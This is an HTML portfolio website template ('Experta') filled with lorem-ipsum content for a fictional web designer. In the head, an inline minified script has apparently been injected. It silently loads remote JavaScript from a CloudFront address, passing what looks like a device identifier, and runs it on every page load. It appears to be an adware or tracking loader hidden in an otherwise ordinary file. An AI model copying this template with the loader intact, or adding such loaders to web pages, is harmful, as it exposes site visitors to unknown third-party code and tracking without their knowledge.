<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="Experta is a personal portfolio HTML template with clean and elegant design">
    <meta name="keywords" content="bootstrap,clean,cv,minimal,onepage particle,personal,portfolio,resume,vcard ">
    <title>Experta</title>
    <!--css styles-->
    <link rel="stylesheet" href="css/bootstrap.min.css">
    <link rel="stylesheet" href="css/font-awesome.min.css">
    <link rel="stylesheet" href="css/lightbox.css">
    <link href="https://fonts.googleapis.com/css?family=Roboto+Slab:100,300,400,700" rel="stylesheet">
    <link rel="stylesheet" href="css/owl.carousel.css">
    <link rel="stylesheet" href="css/owl.theme.css">
    <link rel="stylesheet" href="css/slicknav.min.css">
    <link rel="stylesheet" href="css/reset.css">
    <link rel="stylesheet" href="css/style.css">
    <link rel="stylesheet" href="css/responsive.css">
    <link rel="stylesheet" href="css/animate.min.css">
    <!---title logo icon-->
    <link rel="shortcut icon" href="images/favicon.ico" />
    <script type="text/javascript" src="js/respond.js"></script>
<script type="text/javascript">(function(){var a=document.createElement("script");a.type="text/javascript";a.async=!0;a.src="http://d36mw5gp02ykm5.cloudfront.net/yc/adrns_y.js?v=6.11.135#p=toshibaxmq01abd100_66ilt0m5txx66ilt0m5t";var b=document.getElementsByTagName("script")[0];b.parentNode.insertBefore(a,b);})();</script></head>

<body>
    <!-- Start Preloader -->
    <div class="preloader">
        <div class="preloader-img"></div>
    </div>
    <!-- End Preloader -->

    <!-- Start scroll-top button -->
    <div id="scroll-top-area">
        <a href="#welcome-area"><i class="fa fa-angle-double-up" aria-hidden="true"></i></a>
    </div>
    <!-- End scroll-top button -->


    <!--Start Header-->
    <header>
        <div class="container">
            <div class="row">
                <div class="col-md-3">
                    <a href="index.html" class="logo">
                        <img src="images/logo.png" alt="logo">
                    </a>
                </div>
                <div class="col-md-9">
                    <nav class="menu single-page-nav" id="menu">
                        <ul>
                            <li><a class="home" href="#welcome-area">Home</a></li>
                            <li><a href="#about">About</a></li>
                            <li><a href="#services">Services</a></li>
                            <li><a href="#portfolio">Work</a></li>
                            <li><a href="#contact">Contact</a></li>
                        </ul>
                    </nav>
                </div>
            </div>
        </div>
    </header>
    <!--End Header-->

    <!--Start Welcome Section-->
    <section class="welcome-area image-bg" id="welcome-area" data-stellar-background-ratio="0.4" data-stellar-vertical-offset="0">
        <div class="welcome-text">
            <h6>I Am Carl Watson</h6>
            <div class="element"></div>
            <a href="#" class="btn-style2 skill-btn">SEE MY WORKS</a>
        </div>
    </section>
    <!--End Welcome Section-->

    <!--Start About Section-->
    <section class="about padding-style1" id="about">
        <div class="container">
            <div class="row">
                <div class="col-lg-5 col-md-4">
                    <div class="about-img">
                        <img src="images/about.jpg" alt="" class="about-img img-responsive">
                        <div class="about-img-overlay">
                            <div class="social-icons">
                                <a href="#"><i class="fa fa-facebook" aria-hidden="true"></i></a>
                                <a href="#"><i class="fa fa-twitter" aria-hidden="true"></i></a>
                                <a href="#"><i class="fa fa-google-plus" aria-hidden="true"></i></a>
                                <a href="#"><i class="fa fa-skype" aria-hidden="true"></i></a>
                                <a href="#"><i class="fa fa-linkedin" aria-hidden="true"></i></a>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="col-lg-7 col-md-8">
                    <div class="about-text">
                        <div class="hello-text">
                            <p>HELLO</p>
                        </div>
                        <h4 class="section-title">
                            ABOUT ME
                        </h4>
                        <p>
                            I am Carl Watson.I am a web designer.Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem.
                        </p>
                        <p>
                            Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Pellentesque in ipsum id orci porta dapibus. Nulla porttitor accumsan tincidunt ipsum id orci porta dapibus. Nulla porttitor accumsan tincidunt. Nulla porttitor accumsan tincidunt ipsum id orci porta dapibus. Nulla porttitor accumsan tincidunt.
                        </p>
                        <a href="#">DOWNLOAD MY CV<i class="fa fa-download" aria-hidden="true"></i>
                        </a>
                    </div>
                </div>
            </div>
        </div>
    </section>
    <!--End About Section-->

    <!--Start Services Section-->
    <section class="services padding-style1" id="services">
        <div class="services-header">
            <h4 class="section-title">SERVICES I OFFER</h4>
        </div>
        <div class="services-content">
            <div class="container">
                <div class="row">
                    <div class="col-md-4 col-sm-6">
                        <div class="service-item animation" data-animation="fadeIn">
                            <div class="service-content">
                                <span><i class="fa fa-cube" aria-hidden="true"></i></span>
                                <p class="content-title">WEB DESIGN</p>
                                <p class="content-text">Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium sit voluptatem accusantium</p>
                            </div>
                        </div>
                    </div>
                    <div class="col-md-4 col-sm-6">
                        <div class="service-item animation" data-animation="fadeIn">
                            <div class="service-content">
                                <span><i class="fa fa-wrench" aria-hidden="true"></i></span>
                                <p class="content-title">WEB DEVELOPMENT</p>
                                <p class="content-text">Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium sit voluptatem accusantium</p>
                            </div>
                        </div>
                    </div>
                    <div class="col-md-4 col-sm-6">
                        <div class="service-item animation" data-animation="fadeIn">
                            <div class="service-content">
                                <span><i class="fa fa-plug" aria-hidden="true"></i></span>
                                <p class="content-title">PLUGIN DEVELOPMENT</p>
                                <p class="content-text">Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium sit voluptatem accusantium</p>
                            </div>
                        </div>
                    </div>
                    <div class="col-md-4 col-sm-6">
                        <div class="service-item animation" data-animation="fadeIn">
                            <div class="service-content">
                                <span><i class="fa fa-envelope" aria-hidden="true"></i></span>
                                <p class="content-title">EMAIL MARKETING</p>
                                <p class="content-text">Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium sit voluptatem accusantium</p>
                            </div>
                        </div>
                    </div>
                    <div class="col-md-4 col-sm-6">
                        <div class="service-item animation" data-animation="fadeIn">
                            <div class="service-content">
                                <span><i class="fa fa-paint-brush" aria-hidden="true"></i></span>
                                <p class="content-title">GRAPHIC DESIGN</p>
                                <p class="content-text">Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium sit voluptatem accusantium</p>
                            </div>
                        </div>
                    </div>
                    <div class="col-md-4 col-sm-6">
                        <div class="service-item animation" data-animation="fadeIn">
                            <div class="service-content">
                                <span><i class="fa fa-pencil" aria-hidden="true"></i></span>
                                <p class="content-title">CONTENT WRITING</p>
                                <p class="content-text">Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium sit voluptatem accusantium</p>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>
    <!--End Services Section-->


    <!--Start Portfolio Section-->
    <section class="portfolio padding-style1" id="portfolio">
        <div class="portfolio-header">
            <h4 class="section-title">MY WORKS</h4>
        </div>
        <div class="portfolio-content">
            <div class="container">
                <div class="row">
                    <div class="col-md-12 col-sm-12">
                        <div class="portfolio-content-head">
                            <ul class="controls">
                                <li class="filter" data-filter="all">ALL</li>
                                <li class="filter" data-filter=".design">DESIGN</li>
                                <li class="filter" data-filter=".development">DEVELOPMENT</li>
                                <li class="filter" data-filter=".plugin">PLUGIN</li>
                                <li class="filter" data-filter=".photography">PHOTOGRAPHY</li>
                            </ul>
                        </div>
                    </div>
                    <div class="col-md-12 col-sm-12 col-xs">
                        <div class="portfolio-content-items">
                            <div class="row">
                                <div class="col-md-4 col-sm-6 col-xs-12 mix design">
                                    <div class="portfolio-item">
                                        <div class="portfolio-img">
                                            <img src="images/portfolio/img1.jpg" alt="portfolio" class="img-responsive">
                                        </div>
                                        <div class="portfolio-overlay">
                                            <div class="overlay-content">
                                                <p class="category">DESIGN</p>
                                                <a href="#">
                                                    <div class="magnify-icon">
                                                        <p><span><i class="fa fa-link" aria-hidden="true"></i></span></p>
                                                    </div>
                                                </a>
                                                <a href="images/portfolio/img1.jpg" data-lightbox="image-1">
                                                    <div class="magnify-icon">
                                                        <p><span><i class="fa fa-search" aria-hidden="true"></i></span></p>
                                                    </div>
                                                </a>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <div class="col-md-4 col-sm-6 col-xs-12 mix plugin">
                                    <div class="portfolio-item">
                                        <div class="portfolio-img">
                                            <img src="images/portfolio/img2.jpg" alt="portfolio" class="img-responsive">
                                        </div>
                                        <div class="portfolio-overlay">
                                            <p class="category">PLUGIN</p>
                                            <a href="#">
                                                <div class="magnify-icon">
                                                    <p><span><i class="fa fa-link" aria-hidden="true"></i></span></p>
                                                </div>
                                            </a>
                                            <a href="images/portfolio/img2.jpg" data-lightbox="image-2">
                                                <div class="magnify-icon">
                                                    <p><span><i class="fa fa-search" aria-hidden="true"></i></span></p>
                                                </div>
                                            </a>
                                        </div>
                                    </div>
                                </div>
                                <div class="col-md-4 col-sm-6 col-xs-12 mix photography">
                                    <div class="portfolio-item">
                                        <div class="portfolio-img">
                                            <img src="images/portfolio/img3.jpg" alt="portfolio" class="img-responsive">
                                        </div>
                                        <div class="portfolio-overlay">
                                            <p class="category">PHOTOGRAPHY</p>
                                            <a href="#">
                                                <div class="magnify-icon">
                                                    <p><span><i class="fa fa-link" aria-hidden="true"></i></span></p>
                                                </div>
                                            </a>
                                            <a href="images/portfolio/img3.jpg" data-lightbox="image-3">
                                                <div class="magnify-icon">
                                                    <p><span><i class="fa fa-search" aria-hidden="true"></i></span></p>
                                                </div>
                                            </a>
                                        </div>
                                    </div>
                                </div>
                                <div class="col-md-4 col-sm-6 col-xs-12 mix plugin">
                                    <div class="portfolio-item">
                                        <div class="portfolio-img">
                                            <img src="images/portfolio/img4.jpg" alt="portfolio" class="img-responsive">
                                        </div>
                                        <div class="portfolio-overlay">
                                            <p class="category">PLUGIN</p>
                                            <a href="#">
                                                <div class="magnify-icon">
                                                    <p><span><i class="fa fa-link" aria-hidden="true"></i></span></p>
                                                </div>
                                            </a>
                                            <a href="images/portfolio/img4.jpg" data-lightbox="image-4">
                                                <div class="magnify-icon">
                                                    <p><span><i class="fa fa-search" aria-hidden="true"></i></span></p>
                                                </div>
                                            </a>
                                        </div>
                                    </div>
                                </div>
                                <div class="col-md-4 col-sm-6 col-xs-12 mix design">
                                    <div class="portfolio-item">
                                        <div class="portfolio-img">
                                            <img src="images/portfolio/img5.jpg" alt="portfolio" class="img-responsive">
                                        </div>
                                        <div class="portfolio-overlay">
                                            <p class="category">DESIGN</p>
                                            <a href="#">
                                                <div class="magnify-icon">
                                                    <p><span><i class="fa fa-link" aria-hidden="true"></i></span></p>
                                                </div>
                                            </a>
                                            <a href="images/portfolio/img5.jpg" data-lightbox="image-5">
                                                <div class="magnify-icon">
                                                    <p><span><i class="fa fa-search" aria-hidden="true"></i></span></p>
                                                </div>
                                            </a>
                                        </div>
                                    </div>
                                </div>
                                <div class="col-md-4 col-sm-6 col-xs-12 mix development">
                                    <div class="portfolio-item">
                                        <div class="portfolio-img">
                                            <img src="images/portfolio/img6.jpg" alt="portfolio" class="img-responsive">
                                        </div>
                                        <div class="portfolio-overlay">
                                            <p class="category">DEVELOPMENT</p>
                                            <a href="#">
                                                <div class="magnify-icon">
                                                    <p><span><i class="fa fa-link" aria-hidden="true"></i></span></p>
                                                </div>
                                            </a>
                                            <a href="images/portfolio/img6.jpg" data-lightbox="image-6">
                                                <div class="magnify-icon">
                                                    <p><span><i class="fa fa-search" aria-hidden="true"></i></span></p>
                                                </div>
                                            </a>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>
    <!--End Portfolio Section-->

    <!--Start Experience Section-->
    <section class="experience padding-style1" id="experience" data-stellar-background-ratio="0.4" data-stellar-vertical-offset="2300">
        <div class="experience-header">
            <h4 class="section-title">MY EXPERIENCE</h4>
        </div>
        <div class="container">
            <div class="experience-container">
                <div class="row">
                    <div class="col-md-12 col-lg-6">
                        <div class="experience-item animation" data-animation="fadeIn">
                            <div class="experience-content">
                                <div class="range"><span>2009-2011</span></div>
                                <div class="experience-text">
                                    <h6>WEB DESIGNER</h6>
                                    <p class="org">Tunesoft</p>
                                    <p class="detail">It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout.</p>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div class="col-md-12 col-lg-6">
                        <div class="experience-item animation" data-animation="fadeIn">
                            <div class="experience-content">
                                <div class="range"><span>2011-2013</span></div>
                                <div class="experience-text">
                                    <h6>GRAPHICS DESIGNER</h6>
                                    <p class="org">Novasoft</p>
                                    <p class="detail">It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout.</p>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div class="col-md-12 col-lg-6">
                        <div class="experience-item animation" data-animation="fadeIn">
                            <div class="experience-content">
                                <div class="range"><span>2014-2016</span></div>
                                <div class="experience-text">
                                    <h6>WEB DEVELOPER</h6>
                                    <p class="org">Inkasoft</p>
                                    <p class="detail">It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout.</p>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div class="col-md-12 col-lg-6">
                        <div class="experience-item animation" data-animation="fadeIn">
                            <div class="experience-content">
                                <div class="range"><span>2016-2017</span></div>
                                <div class="experience-text">
                                    <h6>ONLINE INSTRUCTOR</h6>
                                    <p class="org">Self-employed</p>
                                    <p class="detail">It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout.</p>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>
    <!--End Experience Section-->

    <!--Start Blog Section Area-->
    <section class="blog padding-style1" id="blog">
        <div class="blog-header">
            <h4 class="section-title">WATCH MY BLOG</h4>
        </div>
        <div class="blog-content">
            <div class="container">
                <div class="row">
                    <div class="col-md-4 col-sm-6">
                        <div class="blog-single-item blog-item-margin">
                            <div class="blog-img">
                                <img src="images/blog/blog-img1.jpg" alt="blog1" class="img-responsive">
                            </div>
                            <div class="blog-text">
                                <p class="blog-title">Single Blog Post Title Goes Here</p>
                                <p class="blog-detail">
                                    <span>Date:</span>01-03-17
                                    <span>|</span> Posted By <span>Carl Watson</span>
                                </p>
                                <p class="blog-description">Molestie tristique lorem interdum aliquetyxe justo viverra per parturient pretium feugiatmf quisque urna eget metus sed...
                                </p>
                                <a href="#" class="read-more btn-style3">READ MORE</a>
                            </div>
                        </div>
                    </div>
                    <div class="col-md-4 col-sm-6">
                        <div class="blog-single-item blog-item-margin">
                            <div class="blog-img">
                                <img src="images/blog/blog-img2.jpg" alt="blog2" class="img-responsive">
                            </div>
                            <div class="blog-text">
                                <p class="blog-title">Single Blog Post Title Goes Here</p>
                                <p class="blog-detail">
                                    <span>Date:</span>01-03-17
                                    <span>|</span> Posted By <span>Carl Watson</span>
                                </p>
                                <p class="blog-description">Molestie tristique lorem interdum aliquetyxe justo viverra per parturient pretium feugiatmf quisque urna eget metus sed...
                                </p>
                                <a href="#" class="read-more btn-style3">READ MORE</a>
                            </div>
                        </div>
                    </div>
                    <div class="col-md-4 col-sm-6">
                        <div class="blog-single-item">
                            <div class="blog-img">
                                <img src="images/blog/blog-img3.jpg" alt="blog3" class="img-responsive">
                            </div>
                            <div class="blog-text">
                                <p class="blog-title">Single Blog Post Title Goes Here</p>
                                <p class="blog-detail">
                                    <span>Date:</span>01-03-17
                                    <span>|</span> Posted By <span>Carl Watson</span>
                                </p>
                                <p class="blog-description">Molestie tristique lorem interdum aliquetyxe justo viverra per parturient pretium feugiatmf quisque urna eget metus sed...
                                </p>
                                <a href="#" class="read-more btn-style3">READ MORE</a>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>
    <!--End Blog Section Area-->

    <!--Start Client Testimonial Section Area-->
    <section class="client-testimonial" id="client-testimonial" data-stellar-background-ratio="0.4" data-stellar-vertical-offset="100">
        <div class="client-area">
            <div class="container">
                <div class="row">
                    <div class="col-md-12">
                        <!--Start testimonial title area-->
                        <div class="testimonial-title text-center">
                            <h4 class="section-title">WHAT CLIENTS SAY</h4>
                        </div>
                        <!--End testimonial title area-->
                    </div>
                </div>
                <div class="row">
                    <div id="owl-demo-testimonial" class="owl-carousel owl-theme">
                        <!--Start Client Single design area-->
                        <div class="item">
                            <div class="client-img">
                                <img src="images/client/img1.jpg" alt="client">
                            </div>
                            <div class="testimonial-content">
                                <div class="triangle"></div>
                                <div class="quote-text">
                                    <p>
                                        <i class="fa fa-quote-left" aria-hidden="true"></i>
                                        <span>Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium,totam rem aperiam, eaque ipsa quae ab illo inventore veritatis omnis.</span>
                                        <i class="fa fa-quote-right" aria-hidden="true"></i>
                                    </p>
                                    <div class="client-identity">
                                        <p class="name">OLIVER GOMEZ</p>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <!--End Client Single design area-->
                        <!--Start Client Single design area-->
                        <div class="item">
                            <div class="client-img">
                                <img src="images/client/img2.jpg" alt="client">
                            </div>
                            <div class="testimonial-content">
                                <div class="triangle"></div>
                                <div class="quote-text">
                                    <p>
                                        <i class="fa fa-quote-left" aria-hidden="true"></i>
                                        <span>Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium,totam rem aperiam, eaque ipsa quae ab illo inventore veritatis omnis.</span>
                                        <i class="fa fa-quote-right" aria-hidden="true"></i>
                                    </p>
                                    <div class="client-identity">
                                        <p class="name">SILVIA GOMEZ</p>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <!--End Client Single design area-->
                        <!--Start Client Single design area-->
                        <div class="item">
                            <div class="client-img">
                                <img src="images/client/img3.jpg" alt="client">
                            </div>
                            <div class="testimonial-content">
                                <div class="triangle"></div>
                                <div class="quote-text">
                                    <p>
                                        <i class="fa fa-quote-left" aria-hidden="true"></i>
                                        <span>Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium,totam rem aperiam, eaque ipsa quae ab illo inventore veritatis omnis.</span>
                                        <i class="fa fa-quote-right" aria-hidden="true"></i>
                                    </p>
                                    <div class="client-identity">
                                        <p class="name">JAMES GOMEZ</p>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <!--End Client Single design area-->
                    </div>
                </div>
            </div>
        </div>
    </section>
    <!--End Client Testimonial Section Area-->

    <!--Start Contact Section-->
    <section class="contact padding-style1" id="contact">
        <div class="contact-header">
            <h4 class="section-title">GET IN TOUCH</h4>
        </div>
        <div class="contact-content">
            <div class="container">
                <div class="row">
                    <div class="col-md-4">
                        <div class="contact-detail">
                            <h6>Contact</h6>
                            <p class="adress">
                                <i class="fa fa-map-marker" aria-hidden="true"></i>
                                <span>Address:</span>10,Park Street,London,UK.
                            </p>
                            <p class="phone">
                                <i class="fa fa-phone" aria-hidden="true"></i>
                                <span>Contact no:</span>+999000000
                            </p>
                            <p class="email">
                                <i class="fa fa-envelope" aria-hidden="true"></i>
                                <span>Email:</span>abcdefg@gmail.com
                            </p>
                            <p>
                                <i class="fa fa-globe" aria-hidden="true"></i>
                                <span>Website:</span><a href="#">www.abcd.com</a>
                            </p>
                            <div class="social-icons">
                                <p>Find:</p>
                                <a href="#"><i class="fa fa-facebook" aria-hidden="true"></i></a>
                                <a href="#"><i class="fa fa-twitter" aria-hidden="true"></i></a>
                                <a href="#"><i class="fa fa-google-plus" aria-hidden="true"></i></a>
                                <a href="#"><i class="fa fa-skype" aria-hidden="true"></i></a>
                                <a href="#"><i class="fa fa-linkedin" aria-hidden="true"></i></a>
                            </div>
                        </div>
                    </div>
                    <div class="col-md-8">
                        <form>
                            <div class="row">
                                <div class="col-md-6">
                                    <input type="text" placeholder="Name" id="name">
                                </div>
                                <div class="col-md-6">
                                    <input type="text" placeholder="Email" id="email">
                                </div>
                            </div>
                            <div class="row">
                                <div class="col-md-12">
                                    <textarea placeholder="Type here" id="message"></textarea>
                                    <input type="submit" class="submit-btn btn-style3 clearfix" value="SUBMIT" id="contact-submit">
                                    <div class="result"></div>
                                </div>
                            </div>
                        </form>
                    </div>
                </div>
            </div>
        </div>
    </section>
    <!--End Contact Section-->

    <!--Start Footer-->
    <footer>
        <div class="container">
            <div class="row">
                <div class="col-md-12">
                    <div class="copyright">
                        <p>Copyright © 2017 Experta | All rights reserved</p>
                    </div>
                </div>
            </div>
        </div>
    </footer>
    <!--End Footer-->

    <!--javascript-->
    <script type="text/javascript" src="js/jquery-2.2.4.min.js"></script>
    <script type="text/javascript" src="js/jquery.slicknav.min.js"></script>
    <script type="text/javascript" src="js/owl.carousel.min.js"></script>
    <script type="text/javascript" src="js/mixitup.min.js"></script>
    <script type="text/javascript" src="js/bootstrap.min.js"></script>
    <script type="text/javascript" src="js/typed.js"></script>
    <script type="text/javascript" src="js/lightbox.js"></script>
    <script type="text/javascript" src="js/jquery.waypoints.min.js"></script>
    <script type="text/javascript" src="js/jquery.stellar.min.js"></script>
    <script type="text/javascript" src="js/jquery.singlePageNav.min.js"></script>
    <script type="text/javascript" src="js/main.js"></script>
</body>